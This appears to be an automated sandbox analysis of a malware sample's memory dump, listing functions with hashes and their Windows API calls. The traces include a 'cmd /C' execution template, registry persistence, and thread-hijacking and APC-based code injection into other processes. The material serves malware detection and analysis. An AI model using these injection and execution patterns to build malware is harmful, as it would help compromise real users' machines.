  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
